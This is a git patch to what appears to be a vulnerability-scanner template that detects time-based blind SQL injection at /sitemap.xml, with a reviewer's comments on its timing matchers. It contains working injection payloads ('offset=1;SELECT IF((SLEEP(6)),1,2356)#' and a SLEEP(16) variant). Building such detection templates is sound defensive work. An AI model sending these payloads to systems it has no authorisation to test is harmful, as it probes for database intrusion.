From a068bf6283d96cac2808363ab4d2b18642224aad Mon Sep 17 00:00:00 2001
From: J4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Sun, 9 Jul 2023 16:17:26 +0800
Subject: [PATCH] Update sitemap-sql-injection.yaml
---
 .../other/sitemap-sql-injection.yaml | 21 +++++++++++++++----
 1 file changed, 17 insertions(+), 4 deletions(-)
diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml
index 72d02f42b5..7a4517f53d 100644
--- a/http/vulnerabilities/other/sitemap-sql-injection.yaml
+++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml
@@ -2,7 +2,7 @@ id: sitemap-sql-injection
 info:
 name: Sitemap - SQL Injection
- author: Aravind
+ author: Aravind,j4vaovo
 severity: high
 reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
 metadata:
@@ -17,10 +17,23 @@ http: POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1 Host: {{Hostname}} + - | + @timeout: 25s + POST /sitemap.xml?offset=1;SELECT IF((SLEEP(16)),1,2356)# HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=6' - - 'status_code == 200' - - 'contains(header, "application/xml") && contains(body, "sitemap>")' + - 'duration_1>=6' + - 'status_code_1 == 200' + - 'contains(body_1, "sitemap>")' + condition: and + + - type: dsl + dsl: + - 'duration_2>=16' + - 'status_code_2 == 200' + - 'contains(body_2, "sitemap>")' condition: and
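Review bot: Both matcher blocks in the second hunk use absolute thresholds (`duration_1>=6`, `duration_2>=16`), so a host that is simply slow to serve /sitemap.xml (16 s or more on both requests) still satisfies them, and the change also drops the `contains(header, "application/xml")` test that used to narrow the match. I would add a relative condition such as `- 'duration_2 - duration_1 >= 8'` so the measured delay has to track the requested sleep, and keep the content-type test as `- 'contains(header_1, "application/xml")'` unless it was removed because it caused false negatives. The first raw request shows no `@timeout` inside the hunk while the second sets 25s; its block opens above the hunk, so confirm it carries a timeout longer than its sleep. As a style point, `matchers-condition: and` over two `condition: and` blocks is equivalent to a single `dsl` list, which would be shorter to read.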